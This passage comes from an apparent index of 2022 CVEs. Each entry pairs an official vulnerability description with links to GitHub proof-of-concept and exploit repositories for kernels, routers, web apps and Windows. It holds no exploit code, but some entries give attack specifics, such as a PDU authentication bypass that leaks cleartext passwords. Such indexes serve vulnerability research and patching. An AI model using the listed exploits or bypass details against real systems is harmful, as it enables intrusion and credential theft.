[heavenswill/CVE-2022-32013](https://github.com/heavenswill/CVE-2022-32013) + +### CVE-2022-32060 (2022-07-07) + +An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file. + + +- [bypazs/CVE-2022-32060](https://github.com/bypazs/CVE-2022-32060) + +### CVE-2022-32073 (2022-07-13) + +WolfSSH v1.4.7 was discovered to contain an integer overflow via the function wolfSSH_SFTP_RecvRMDIR. + + +- [mgregus/project_BIT_nmap_script](https://github.com/mgregus/project_BIT_nmap_script) + +### CVE-2022-32074 (2022-07-13) + +A stored cross-site scripting (XSS) vulnerability in the component audit/class.audit.php of osTicket-plugins - Storage-FS before commit a7842d494889fd5533d13deb3c6a7789768795ae allows attackers to execute arbitrary web scripts or HTML via a crafted SVG file. + + +- [reewardius/CVE-2022-32074](https://github.com/reewardius/CVE-2022-32074) + +### CVE-2022-32114 (2022-07-13) + +An unrestricted file upload vulnerability in the Add New Assets function of Strapi 4.1.12 allows attackers to conduct XSS attacks via a crafted PDF file. NOTE: the project documentation suggests that a user with the Media Library "Create (upload)" permission is supposed to be able to upload PDF files containing JavaScript, and that all files in a public assets folder are accessible to the outside world (unless the filename begins with a dot character). The administrator can choose to allow only image, video, and audio files (i.e., not PDF) if desired. + + +- [bypazs/CVE-2022-32114](https://github.com/bypazs/CVE-2022-32114) + +### CVE-2022-32118 (2022-07-15) + +Arox School ERP Pro v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the dispatchcategory parameter in backoffice.inc.php. + + +- [JC175/CVE-2022-32118](https://github.com/JC175/CVE-2022-32118) + +### CVE-2022-32119 (2022-07-15) + +Arox School ERP Pro v1.0 was discovered to contain multiple arbitrary file upload vulnerabilities via the Add Photo function at photogalleries.inc.php and the import staff excel function at 1finance_master.inc.php. + + +- [JC175/CVE-2022-32119](https://github.com/JC175/CVE-2022-32119) + +### CVE-2022-32132 +- [reewardius/CVE-2022-32132](https://github.com/reewardius/CVE-2022-32132) + +### CVE-2022-32199 (2023-03-27) + +db_convert.php in ScriptCase through 9.9.008 is vulnerable to Arbitrary File Deletion by an admin via a directory traversal sequence in the file parameter. + + +- [Toxich4/CVE-2022-32199](https://github.com/Toxich4/CVE-2022-32199) + +### CVE-2022-32206 (2022-07-07) + +curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors. + + +- [HimanshuS67/external_curl_AOSP10_CVE-2022-32206](https://github.com/HimanshuS67/external_curl_AOSP10_CVE-2022-32206) + +### CVE-2022-32223 (2022-07-14) + +Node.js is vulnerable to Hijack Execution Flow: DLL Hijacking under certain conditions on Windows platforms.This vulnerability can be exploited if the victim has the following dependencies on a Windows machine:* OpenSSL has been installed and “C:\Program Files\Common Files\SSL\openssl.cnf” exists.Whenever the above conditions are present, `node.exe` will search for `providers.dll` in the current user directory.After that, `node.exe` will try to search for `providers.dll` by the DLL Search Order in Windows.It is possible for an attacker to place the malicious file `providers.dll` under a variety of paths and exploit this vulnerability. + + +- [ianyong/cve-2022-32223](https://github.com/ianyong/cve-2022-32223) + +### CVE-2022-32224 (2022-12-05) + +A possible escalation to RCE vulnerability exists when using YAML serialized columns in Active Record < 7.0.3.1, <6.1.6.1, <6.0.5.1 and <5.2.8.1 which could allow an attacker, that can manipulate data in the database (via means like SQL injection), the ability to escalate to an RCE. + + +- [ooooooo-q/cve-2022-32224-rails](https://github.com/ooooooo-q/cve-2022-32224-rails) + +### CVE-2022-32250 (2022-06-02) + +net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free. + + +- [theori-io/CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit) +- [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE) +- [Decstor5/2022-32250LPE](https://github.com/Decstor5/2022-32250LPE) +- [Kristal-g/CVE-2022-32250](https://github.com/Kristal-g/CVE-2022-32250) + +### CVE-2022-32532 (2022-06-28) + +Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass. + + +- [Lay0us/CVE-2022-32532](https://github.com/Lay0us/CVE-2022-32532) + +### CVE-2022-32548 (2022-08-29) + +An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field. + + +- [MosaedH/CVE-2022-32548-RCE-POC](https://github.com/MosaedH/CVE-2022-32548-RCE-POC) + +### CVE-2022-32832 (2022-09-23) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app with root privileges may be able to execute arbitrary code with kernel privileges. + + +- [Muirey03/CVE-2022-32832](https://github.com/Muirey03/CVE-2022-32832) +- [AkbarTrilaksana/CVE-2022-32832](https://github.com/AkbarTrilaksana/CVE-2022-32832) + +### CVE-2022-32862 (2022-11-01) + +This issue was addressed with improved data protection. This issue is fixed in macOS Big Sur 11.7.1, macOS Ventura 13, macOS Monterey 12.6.1. An app with root privileges may be able to access private information. + + +- [rohitc33/CVE-2022-32862](https://github.com/rohitc33/CVE-2022-32862) + +### CVE-2022-32883 (2022-09-20) + +A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to read sensitive location information. + + +- [breakpointHQ/CVE-2022-32883](https://github.com/breakpointHQ/CVE-2022-32883) + +### CVE-2022-32898 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7 and iPadOS 15.7, iOS 16, macOS Ventura 13, watchOS 9. An app may be able to execute arbitrary code with kernel privileges. + + +- [ox1111/CVE-2022-32898](https://github.com/ox1111/CVE-2022-32898) + +### CVE-2022-32932 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 15.7.1 and iPadOS 15.7.1, iOS 16.1 and iPadOS 16, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [ox1111/CVE-2022-32932](https://github.com/ox1111/CVE-2022-32932) + +### CVE-2022-32947 (2022-11-01) + +The issue was addressed with improved memory handling. This issue is fixed in iOS 16.1 and iPadOS 16, macOS Ventura 13, watchOS 9.1. An app may be able to execute arbitrary code with kernel privileges. + + +- [asahilina/agx-exploit](https://github.com/asahilina/agx-exploit) + +### CVE-2022-32988 (2022-06-30) + +Cross Site Scripting (XSS) vulnerability in router Asus DSL-N14U-B1 1.1.2.3_805 via the "*list" parameters (e.g. filter_lwlist, keyword_rulelist, etc) in every ".asp" page containing a list of stored strings. The following asp files are affected: (1) cgi-bin/APP_Installation.asp, (2) cgi-bin/Advanced_ACL_Content.asp, (3) cgi-bin/Advanced_ADSL_Content.asp, (4) cgi-bin/Advanced_ASUSDDNS_Content.asp, (5) cgi-bin/Advanced_AiDisk_ftp.asp, (6) cgi-bin/Advanced_AiDisk_samba.asp, (7) cgi-bin/Advanced_DSL_Content.asp, (8) cgi-bin/Advanced_Firewall_Content.asp, (9) cgi-bin/Advanced_FirmwareUpgrade_Content.asp, (10) cgi-bin/Advanced_GWStaticRoute_Content.asp, (11) cgi-bin/Advanced_IPTV_Content.asp, (12) cgi-bin/Advanced_IPv6_Content.asp, (13) cgi-bin/Advanced_KeywordFilter_Content.asp, (14) cgi-bin/Advanced_LAN_Content.asp, (15) cgi-bin/Advanced_Modem_Content.asp, (16) cgi-bin/Advanced_PortTrigger_Content.asp, (17) cgi-bin/Advanced_QOSUserPrio_Content.asp, (18) cgi-bin/Advanced_QOSUserRules_Content.asp, (19) cgi-bin/Advanced_SettingBackup_Content.asp, (20) cgi-bin/Advanced_System_Content.asp, (21) cgi-bin/Advanced_URLFilter_Content.asp, (22) cgi-bin/Advanced_VPN_PPTP.asp, (23) cgi-bin/Advanced_VirtualServer_Content.asp, (24) cgi-bin/Advanced_WANPort_Content.asp, (25) cgi-bin/Advanced_WAdvanced_Content.asp, (26) cgi-bin/Advanced_WMode_Content.asp, (27) cgi-bin/Advanced_WWPS_Content.asp, (28) cgi-bin/Advanced_Wireless_Content.asp, (29) cgi-bin/Bandwidth_Limiter.asp, (30) cgi-bin/Guest_network.asp, (31) cgi-bin/Main_AccessLog_Content.asp, (32) cgi-bin/Main_AdslStatus_Content.asp, (33) cgi-bin/Main_Spectrum_Content.asp, (34) cgi-bin/Main_WebHistory_Content.asp, (35) cgi-bin/ParentalControl.asp, (36) cgi-bin/QIS_wizard.asp, (37) cgi-bin/QoS_EZQoS.asp, (38) cgi-bin/aidisk.asp, (39) cgi-bin/aidisk/Aidisk-1.asp, (40) cgi-bin/aidisk/Aidisk-2.asp, (41) cgi-bin/aidisk/Aidisk-3.asp, (42) cgi-bin/aidisk/Aidisk-4.asp, (43) cgi-bin/blocking.asp, (44) cgi-bin/cloud_main.asp, (45) cgi-bin/cloud_router_sync.asp, (46) cgi-bin/cloud_settings.asp, (47) cgi-bin/cloud_sync.asp, (48) cgi-bin/device-map/DSL_dashboard.asp, (49) cgi-bin/device-map/clients.asp, (50) cgi-bin/device-map/disk.asp, (51) cgi-bin/device-map/internet.asp, (52) cgi-bin/error_page.asp, (53) cgi-bin/index.asp, (54) cgi-bin/index2.asp, (55) cgi-bin/qis/QIS_PTM_manual_setting.asp, (56) cgi-bin/qis/QIS_admin_pass.asp, (57) cgi-bin/qis/QIS_annex_setting.asp, (58) cgi-bin/qis/QIS_bridge_cfg_tmp.asp, (59) cgi-bin/qis/QIS_detect.asp, (60) cgi-bin/qis/QIS_finish.asp, (61) cgi-bin/qis/QIS_ipoa_cfg_tmp.asp, (62) cgi-bin/qis/QIS_manual_setting.asp, (63) cgi-bin/qis/QIS_mer_cfg.asp, (64) cgi-bin/qis/QIS_mer_cfg_tmp.asp, (65) cgi-bin/qis/QIS_ppp_cfg.asp, (66) cgi-bin/qis/QIS_ppp_cfg_tmp.asp, (67) cgi-bin/qis/QIS_wireless.asp, (68) cgi-bin/query_wan_status.asp, (69) cgi-bin/query_wan_status2.asp, and (70) cgi-bin/start_apply.asp. + + +- [FedericoHeichou/CVE-2022-32988](https://github.com/FedericoHeichou/CVE-2022-32988) + +### CVE-2022-33075 (2022-07-05) + +A stored cross-site scripting (XSS) vulnerability in the Add Classification function of Zoo Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via unspecified vectors. + + +- [angelopioamirante/CVE-2022-33075](https://github.com/angelopioamirante/CVE-2022-33075) + +### CVE-2022-33082 (2022-06-30) + +An issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2 allows attackers to cause a Denial of Service (DoS) via a crafted input. + + +- [cyberqueenmeg/cve-2022-33082-exploit](https://github.com/cyberqueenmeg/cve-2022-33082-exploit) + +### CVE-2022-33174 (2022-06-13) + +Power Distribution Units running on Powertek firmware (multiple brands) before 3.30.30 allows remote authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + + +- [Henry4E36/CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174) + +### CVE-2022-33679 (2022-09-13) + +Windows Kerberos Elevation of Privilege Vulnerability + + +- [Bdenneu/CVE-2022-33679](https://github.com/Bdenneu/CVE-2022-33679) +- [Blyth0He/CVE-2022-33679](https://github.com/Blyth0He/CVE-2022-33679) +- [Amulab/CVE-2022-33679](https://github.com/Amulab/CVE-2022-33679) +- [notareaperbutDR34P3r/Kerberos_CVE-2022-33679](https://github.com/notareaperbutDR34P3r/Kerberos_CVE-2022-33679) + +### CVE-2022-33891 (2022-07-18) + +The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. + + +- [W01fh4cker/cve-2022-33891](https://github.com/W01fh4cker/cve-2022-33891) +- [HuskyHacks/cve-2022-33891](https://github.com/HuskyHacks/cve-2022-33891) +- [west-wind/CVE-2022-33891](https://github.com/west-wind/CVE-2022-33891) +- [AkbarTrilaksana/cve-2022-33891](https://github.com/AkbarTrilaksana/cve-2022-33891) +- [llraudseppll/cve-2022-33891](https://github.com/llraudseppll/cve-2022-33891) +- [AmoloHT/CVE-2022-33891](https://github.com/AmoloHT/CVE-2022-33891) +- [DrLinuxOfficial/CVE-2022-33891](https://github.com/DrLinuxOfficial/CVE-2022-33891) +- [Vulnmachines/Apache-spark-CVE-2022-33891](https://github.com/Vulnmachines/Apache-spark-CVE-2022-33891) +- [ps-interactive/lab_security_apache_spark_emulation_detection](https://github.com/ps-interactive/lab_security_apache_spark_emulation_detection) +- [elsvital/cve-2022-33891-fix](https://github.com/elsvital/cve-2022-33891-fix) +- [K3ysTr0K3R/CVE-2022-33891-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-33891-EXPLOIT) + +### CVE-2022-33980 (2022-07-06) + +Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default. + + +- [tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE](https://github.com/tangxiaofeng7/CVE-2022-33980-Apache-Commons-Configuration-RCE) +- [HKirito/CVE-2022-33980](https://github.com/HKirito/CVE-2022-33980) +- [sammwyy/CVE-2022-33980-POC](https://github.com/sammwyy/CVE-2022-33980-POC) +- [P0lar1ght/CVE-2022-33980-POC](https://github.com/P0lar1ght/CVE-2022-33980-POC) +- [joseluisinigo/riskootext4shell](https://github.com/joseluisinigo/riskootext4shell) + +### CVE-2022-34024 (2022-07-19) + +Barangay Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the resident module editing function at /bmis/pages/resident/resident.php. + + +- [sorabug/bug_report](https://github.com/sorabug/bug_report) + +### CVE-2022-34169 (2022-07-19) + +The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan. + + +- [bor8/CVE-2022-34169](https://github.com/bor8/CVE-2022-34169) +- [flowerwind/AutoGenerateXalanPayload](https://github.com/flowerwind/AutoGenerateXalanPayload) + +### CVE-2022-34265 (2022-07-04) + +An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + + +- [aeyesec/CVE-2022-34265](https://github.com/aeyesec/CVE-2022-34265) +- [traumatising/CVE-2022-34265](https://github.com/traumatising/CVE-2022-34265) +- [ZhaoQi99/CVE-2022-34265](https://github.com/ZhaoQi99/CVE-2022-34265) +- [lnwza0x0a/CTF_Django_CVE-2022-34265](https://github.com/lnwza0x0a/CTF_Django_CVE-2022-34265) + +### CVE-2022-34298 (2022-06-22) + +The NT auth module in OpenAM before 14.6.6 allows a "replace Samba username attack." + + +- [watchtowrlabs/CVE-2022-34298](https://github.com/watchtowrlabs/CVE-2022-34298) + +### CVE-2022-34527 (2022-07-29) + +D-Link DSL-3782 v1.03 and below was discovered to contain a command injection vulnerability via the function byte_4C0160. + + +- [FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2022-34527_D-Link_DSL-3782_Router_command_injection) + +### CVE-2022-34556 (2022-07-28) + +PicoC v3.2.2 was discovered to contain a NULL pointer dereference at variable.c. + + +- [Halcy0nic/CVE-2022-34556](https://github.com/Halcy0nic/CVE-2022-34556) + +### CVE-2022-34683 (2022-12-30) + +NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a null-pointer dereference occurs, which may lead to denial of service. + + +- [gmh5225/CVE-2022-34683](https://github.com/gmh5225/CVE-2022-34683) + +### CVE-2022-34715 (2022-08-09) + +Windows Network File System Remote Code Execution Vulnerability + + +- [Starssgo/CVE-2022-34715-POC](https://github.com/Starssgo/CVE-2022-34715-POC) + +### CVE-2022-34718 (2022-09-13) + +Windows TCP/IP Remote Code Execution Vulnerability + + +- [SecLabResearchBV/CVE-2022-34718-PoC](https://github.com/SecLabResearchBV/CVE-2022-34718-PoC) + +### CVE-2022-34753 (2022-07-13) + +A CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause remote root exploit when the command is compromised. Affected Products: SpaceLogic C-Bus Home Controller (5200WHC2), formerly known as C-Bus Wiser Homer Controller MK2 (V1.31.460 and prior) + + +- [K3ysTr0K3R/CVE-2022-34753-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-34753-EXPLOIT) + +### CVE-2022-34913 (2022-07-02) + +md2roff 1.7 has a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. NOTE: the vendor's position is that the product is not intended for untrusted input + + +- [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913) + +### CVE-2022-34918 (2022-07-04) + +An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. + + +- [randorisec/CVE-2022-34918-LPE-PoC](https://github.com/randorisec/CVE-2022-34918-LPE-PoC) +- [merlinepedra25/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra25/CVE-2022-34918-LPE-PoC) +- [merlinepedra/CVE-2022-34918-LPE-PoC](https://github.com/merlinepedra/CVE-2022-34918-LPE-PoC) +- [linulinu/CVE-2022-34918](https://github.com/linulinu/CVE-2022-34918) +- [veritas501/CVE-2022-34918](https://github.com/veritas501/CVE-2022-34918) + +### CVE-2022-34919 (2022-08-23) + +The file upload wizard in Zengenti Contensis Classic before 15.2.1.79 does not correctly check that a user has authenticated. By uploading a crafted aspx file, it is possible to execute arbitrary commands. + + +- [ahajnik/CVE-2022-34919](https://github.com/ahajnik/CVE-2022-34919) + +### CVE-2022-34961 (2022-07-25) + +OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module. + + +- [bypazs/CVE-2022-34961](https://github.com/bypazs/CVE-2022-34961) + +### CVE-2022-34962 (2022-07-25) + +OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Group Timeline module. + + +- [bypazs/CVE-2022-34962](https://github.com/bypazs/CVE-2022-34962) + +### CVE-2022-34963 (2022-07-25) + +OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the News Feed module. + + +- [bypazs/CVE-2022-34963](https://github.com/bypazs/CVE-2022-34963) + +### CVE-2022-34970 (2022-08-04) + +Crow before 1.0+4 has a heap-based buffer overflow via the function qs_parse in query_string.h. On successful exploitation this vulnerability allows attackers to remotely execute arbitrary code in the context of the vulnerable service. + + +- [0xhebi/CVE-2022-34970](https://github.com/0xhebi/CVE-2022-34970) + +### CVE-2022-35131 (2022-07-25) + +Joplin v2.8.8 allows attackers to execute arbitrary commands via a crafted payload injected into the Node titles. + + +- [ly1g3/Joplin-CVE-2022-35131](https://github.com/ly1g3/Joplin-CVE-2022-35131) + +### CVE-2022-35405 (2022-07-19) + +Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.) + + +- [viniciuspereiras/CVE-2022-35405](https://github.com/viniciuspereiras/CVE-2022-35405) + +### CVE-2022-35411 (2022-07-08) + +rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer: pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. + + +- [fuzzlove/CVE-2022-35411](https://github.com/fuzzlove/CVE-2022-35411) + +### CVE-2022-35416 (2022-07-11) + +H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. + + +- [safe3s/CVE-2022-35416](https://github.com/safe3s/CVE-2022-35416) + +### CVE-2022-35500 (2022-11-23) + +Amasty Blog 2.10.3 is vulnerable to Cross Site Scripting (XSS) via leave comment functionality. + + +- [afine-com/CVE-2022-35500](https://github.com/afine-com/CVE-2022-35500) + +### CVE-2022-35501 (2022-11-23) + +Stored Cross-site Scripting (XSS) exists in the Amasty Blog Pro 2.10.3 and 2.10.4 plugin for Magento 2 because of the duplicate post function. + + +- [afine-com/CVE-2022-35501](https://github.com/afine-com/CVE-2022-35501) + +### CVE-2022-35513 (2022-09-07) + +The Blink1Control2 application <= 2.2.7 uses weak password encryption and an insecure method of storage. + + +- [p1ckzi/CVE-2022-35513](https://github.com/p1ckzi/CVE-2022-35513) + +### CVE-2022-35649 (2022-07-25) + +The vulnerability was found in Moodle, occurs due to improper input validation when parsing PostScript code. An omitted execution parameter results in a remote code execution risk for sites running GhostScript versions older than 9.50. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system. + + +- [antoinenguyen-09/CVE-2022-35649](https://github.com/antoinenguyen-09/CVE-2022-35649) + +### CVE-2022-35698 (2022-10-14) + +Adobe Commerce versions 2.4.4-p1 (and earlier) and 2.4.5 (and earlier) are affected by a Stored Cross-site Scripting vulnerability. Exploitation of this issue does not require user interaction and could result in a post-authentication arbitrary code execution. + + +- [EmicoEcommerce/Magento-APSB22-48-Security-Patches](https://github.com/EmicoEcommerce/Magento-APSB22-48-Security-Patches) + +### CVE-2022-35737 (2022-08-03) + +SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API. + + +- [gmh5225/CVE-2022-35737](https://github.com/gmh5225/CVE-2022-35737) +- [rvermeulen/codeql-cve-2022-35737](https://github.com/rvermeulen/codeql-cve-2022-35737) + +### CVE-2022-35841 (2022-09-13) + +Windows Enterprise App Management Service Remote Code Execution Vulnerability + + +- [Wack0/CVE-2022-35841](https://github.com/Wack0/CVE-2022-35841) + +### CVE-2022-35899 (2022-07-21) + +There is an unquoted service path in ASUSTeK Aura Ready Game SDK service (GameSDK.exe) 1.0.0.4. This might allow a local user to escalate privileges by creating a %PROGRAMFILES(X86)%\ASUS\GameSDK.exe file. + + +- [angelopioamirante/CVE-2022-35899](https://github.com/angelopioamirante/CVE-2022-35899) + +### CVE-2022-35914 (2022-09-19) + +/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. + + +- [cosad3s/CVE-2022-35914-poc](https://github.com/cosad3s/CVE-2022-35914-poc) +- [Lzer0Kx01/CVE-2022-35914](https://github.com/Lzer0Kx01/CVE-2022-35914) +- [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914) +- [0xGabe/CVE-2022-35914](https://github.com/0xGabe/CVE-2022-35914) +- [Johnermac/CVE-2022-35914](https://github.com/Johnermac/CVE-2022-35914) +- [senderend/CVE-2022-35914](https://github.com/senderend/CVE-2022-35914) +- [noxlumens/CVE-2022-35914_poc](https://github.com/noxlumens/CVE-2022-35914_poc) +- [btar1gan/exploit_CVE-2022-35914](https://github.com/btar1gan/exploit_CVE-2022-35914) + +### CVE-2022-35919 (2022-08-01) + +MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. In affected versions all 'admin' users authorized for `admin:ServerUpdate` can selectively trigger an error that in response, returns the content of the path requested. Any normal OS system would allow access to contents at any arbitrary paths that are readable by MinIO process. Users are advised to upgrade. Users unable to upgrade may disable ServerUpdate API by denying the `admin:ServerUpdate` action for your admin users via IAM policies. + + +- [ifulxploit/Minio-Security-Vulnerability-Checker](https://github.com/ifulxploit/Minio-Security-Vulnerability-Checker) + +### CVE-2022-36067 (2022-09-06) + +vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. There are no known workarounds. + + +- [0x1nsomnia/CVE-2022-36067-vm2-POC-webapp](https://github.com/0x1nsomnia/CVE-2022-36067-vm2-POC-webapp) +- [Prathamrajgor/Exploit-For-CVE-2022-36067](https://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067) + +### CVE-2022-36162 +- [MaherAzzouzi/CVE-2022-36162](https://github.com/MaherAzzouzi/CVE-2022-36162) + +### CVE-2022-36163 +- [MaherAzzouzi/CVE-2022-36163](https://github.com/MaherAzzouzi/CVE-2022-36163) + +### CVE-2022-36193 (2022-11-28) + +SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries. + + +- [G37SYS73M/CVE-2022-36193](https://github.com/G37SYS73M/CVE-2022-36193) + +### CVE-2022-36200 (2022-08-29) + +In FiberHome VDSL2 Modem HG150-Ub_V3.0, Credentials of Admin are submitted in URL, which can be logged/sniffed. + + +- [afaq1337/CVE-2022-36200](https://github.com/afaq1337/CVE-2022-36200) + +### CVE-2022-36231 (2023-02-23) + +pdf_info 0.5.3 is vulnerable to Command Execution because the Ruby code uses backticks instead of Open3. + + +- [affix/CVE-2022-36231](https://github.com/affix/CVE-2022-36231) + +### CVE-2022-36234 (2022-07-28) + +SimpleNetwork TCP Server commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 was discovered to contain a double free vulnerability which is exploited via crafted TCP packets. + + +- [Halcy0nic/CVE-2022-36234](https://github.com/Halcy0nic/CVE-2022-36234) + +### CVE-2022-36267 (2022-08-08) + +In Airspan AirSpot 5410 version 0.3.4.1-4 and under there exists a Unauthenticated remote command injection vulnerability. The ping functionality can be called without user authentication when crafting a malicious http request by injecting code in one of the parameters allowing for remote code execution. This vulnerability is exploited via the binary file /home/www/cgi-bin/diagnostics.cgi that accepts unauthenticated requests and unsanitized data. As a result, a malicious actor can craft a specific request and interact remotely with the device. + + +- [0xNslabs/CVE-2022-36267-PoC](https://github.com/0xNslabs/CVE-2022-36267-PoC) + +### CVE-2022-36271 (2022-09-07) + +Outbyte PC Repair Installation File 1.7.112.7856 is vulnerable to Dll Hijacking. iertutil.dll is missing so an attacker can use a malicious dll with same name and can get admin privileges. + + +- [SaumyajeetDas/POC-of-CVE-2022-36271](https://github.com/SaumyajeetDas/POC-of-CVE-2022-36271) + +### CVE-2022-36432 (2022-11-17) + +The Preview functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 uses eval unsafely. This allows attackers to perform Cross-site Scripting attacks on admin panel users by manipulating the generated preview application response. + + +- [afine-com/CVE-2022-36432](https://github.com/afine-com/CVE-2022-36432) + +### CVE-2022-36433 (2022-11-29) + +The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save. + + +- [afine-com/CVE-2022-36433](https://github.com/afine-com/CVE-2022-36433) + +### CVE-2022-36446 (2022-07-25) + +software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command. + + +- [p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE](https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE) +- [emirpolatt/CVE-2022-36446](https://github.com/emirpolatt/CVE-2022-36446) +- [Kang3639/CVE-2022-36446](https://github.com/Kang3639/CVE-2022-36446) + +### CVE-2022-36532 (2022-09-16) + +Bolt CMS contains a vulnerability in version 5.1.12 and below that allows an authenticated user with the ROLE_EDITOR privileges to upload and rename a malicious file to achieve remote code execution. + + +- [lutrasecurity/CVE-2022-36532](https://github.com/lutrasecurity/CVE-2022-36532) + +### CVE-2022-36537 (2022-08-26) + +ZK Framework v9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 allows attackers to access sensitive information via a crafted POST request sent to the component AuUploader. + + +- [agnihackers/CVE-2022-36537-EXPLOIT](https://github.com/agnihackers/CVE-2022-36537-EXPLOIT) 